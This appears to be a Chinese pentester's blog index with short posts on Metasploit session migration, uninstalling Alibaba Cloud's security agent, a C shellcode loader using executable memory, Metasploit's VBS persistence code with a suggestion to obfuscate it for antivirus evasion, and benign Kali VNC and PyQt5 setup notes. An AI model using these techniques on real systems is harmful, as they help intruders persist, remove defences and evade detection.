stager自动迁移进程

转自:https://community.rapid7.com/thread/3822
What you are experiencing is common on systems in the wild (I see it more often in VM environments). Basically, the process you’re exploiting is not stable enough to keep a shell open, and as you seem to already know, you need to migrate into another process ASAP in order to keep your shell. Instead of set PrependMigrate true try:

set InitialAutoRunScript migrate -f

I have had better experiences with this method than with the PrependMigrate method.

nap_

Linux卸载阿里云服务、云盾、安骑士

Linux类型系统

下载 http://update.aegis.aliyun.com/download/uninstall.sh

执行下列命令:chmod +x uninstall.sh
sh uninstall.sh (Debian为./uninstall.sh)
rm /usr/sbin/aliyun-service
rm lib/systemd/system/aliyun.service
控制面板卸载:
安骑士 ->设置 ->安装安骑士
不过官方提供的自动卸载好像并没有什么卵用

Kali+VNC除了LXDE另一种方案

转自:https://forums.kali.org/showthread.php?26823-Remote-access-with-SSH-TightVNC-failed-with-new-Kali-2-0
I have, but it involves installing the MATE desktop environment, which is a GNOME 2 fork.

First, you have to install MATE:

$ sudo apt-get install mate-core mate-desktop-environment-extra mate-desktop-environment-extras mate-themes

Then, you have to change a line in the ~/.vnc/xstartup, replacing

/etc/X11/Xsession

with

/usr/bin/mate-session

It is just a workaround, as MATE offers a different look and feel than GNOME.

The underlying problems with GNOME and VNC (and RDP, NX, …) are described here:

https://bugs.debian.org/cgi-bin/bugr…cgi?bug=776746
https://bugs.launchpad.net/ubuntu/+s…n/+bug/1251281

and it looks like a fix for Debian will take some time…

转几个ShellcodeLoader

refer:https://github.com/VeroFess/shellcode_loader/blob/master/loader.c

#include <stdio.h>

#ifdef _MSC_VER
#define forceinline __forceinline
#elif defined __GNUC__
#define forceinline __inline__ __attribute__((always_inline))
#else
#define forceinline
#endif

#ifdef linux
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#ifdef __x86_64__
#define __VM_X64
#elif __i386__
#define __VM_X32
#endif
forceinline void * __runable_malloc(int size) {
	int fd = open("/dev/zero", O_RDONLY);
	void * ret = mmap(NULL, size, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE, fd, 0);
	close(fd);
	return ret;
}
#else
#include <Windows.h>
#ifdef _WIN64
#define __VM_X64
#else
#define __VM_X32
#endif
forceinline void * __runable_malloc(int size) {
	return VirtualAlloc(0, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
}
#endif

forceinline void * __makefuncttion(unsigned char * shellcode, int len) {
	void * address_shellcode = __runable_malloc(len + 1);
	memcpy((char *)address_shellcode, shellcode, len);
	*((char *)address_shellcode + len) = 0xc3;
	return address_shellcode;
}

int main() {
typedef unsigned long(*func)();
#ifdef __VM_X64
	unsigned char shellcode[] = { 0x48,0xC7,0xC0,0x01,0x00,0x00,0x00 };
#else
	unsigned char shellcode[] = { 0xb8,0x01,0x00,0x00,0x00 };
#endif
	func fun = (func)__makefuncttion(shellcode, sizeof(shellcode));
	int ret = fun();
	printf("ret is : %d\n", ret);
	getchar();
	return 0;
}

继续阅读转几个ShellcodeLoader

msf persist免杀

persist调用
/usr/local/share/metasploit-framework/modules/exploits/windows/local/persistence.rb

    exe = generate_payload_exe
    # Generate the vbs payload
    vprint_status("Generating VBS persistent script (#{rvbs_name})")
    vbsscript = ::Msf::Util::EXE.to_exe_vbs(exe, {:persist => true, :delay => delay, :exe_filename => rexe_name})

::Msf::Util::EXE.to_exe_vbs 来自 /usr/local/share/metasploit-framework/lib/msf/util/exe.rb

  # self.to_exe_vba
  #
  # @param  exes  [String]
  # @param  opts  [Hash]
  # @option opts  [String] :delay
  # @option opts  [String] :persists
  # @option opts  [String] :exe_filename
  def self.to_exe_vbs(exes = '', opts = {})
    delay   = opts[:delay]   || 5
    persist = opts[:persist] || false

    hash_sub = {}
    hash_sub[:exe_filename]  = opts[:exe_filename] || Rex::Text.rand_text_alpha(rand(8)+8) << '.exe'
    hash_sub[:base64_filename]  = Rex::Text.rand_text_alpha(rand(8)+8) << '.b64'
    hash_sub[:var_shellcode] = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:var_fname]     = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:var_func]      = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:var_obj]       = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:var_shell]     = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:var_tempdir]   = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:var_tempexe]   = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:var_basedir]   = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:base64_shellcode] = Rex::Text.encode_base64(exes)
    hash_sub[:var_decodefunc] = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:var_xml] = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:var_xmldoc] = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:var_decoded] = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:var_adodbstream] = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:var_decodebase64] = Rex::Text.rand_text_alpha(rand(8)+8)
    hash_sub[:init] = ""

    if persist
      hash_sub[:init] << "Do\r\n"
      hash_sub[:init] << "#{hash_sub[:var_func]}\r\n"
      hash_sub[:init] << "WScript.Sleep #{delay * 1000}\r\n"
      hash_sub[:init] << "Loop\r\n"
    else
      hash_sub[:init] << "#{hash_sub[:var_func]}\r\n"
    end

    read_replace_script_template("to_exe.vbs.template", hash_sub)
  end

to_exe.vbs.template 来自 /usr/local/share/metasploit-framework/data/templates/scripts/to_exe.vbs.template

然后,各种变形混淆吧

msf tips: session is not valid and will be closed

本地可绑定IP与外网IP不一致时
LHOST LPORT用来帮助信标找到服务器
ReverseListenerBindHost 是绑定地址
另外需要关闭AutoVerifySession(原因未知)

问题:
https://github.com/rapid7/metasploit-framework/issues/6799
参见:
https://github.com/rapid7/metasploit-framework/wiki/Debugging-Dead-Meterpreter-Sessions
继续阅读msf tips: session is not valid and will be closed

pyq5开发环境部署

1.eric IDE开发环境
http://eric-ide.python-projects.org/eric-download.html
Installation using PyQt5 wheels

Installing eric6 and its pre-requisites is easy using the PyQt5 Python wheels. In order to have access to the suite of Qt tools and documentation it is recommended to install the Qt development environment because these tools are not part of the PyQt5 wheels.

Download the Qt online installer from the Qt download site.
Install Qt by executing the installer.
Install the eric6 pre-requisites (PyQt, sip and QScintilla) by entering this command in a shell / command window:
pip install qscintilla
or
pip3 install qscintilla
This will install QScintilla and all dependencies, which are PyQt5 and sip.
Install eric6 and configure the path to the Qt tools on the Qt page of the configuration dialog.
Once the eric6 IDE is started the Qt documentation may be loaded into the eric web browser via the Settings ➡ Mange Qt Help Documents menu entry. Note that the documentation (Python/Qt/PyQt) is available in QtHelp format as of November 2016 as documentation plug-ins. In order to use this feature, eric 16.11 or newer needs to be installed.
继续阅读pyq5开发环境部署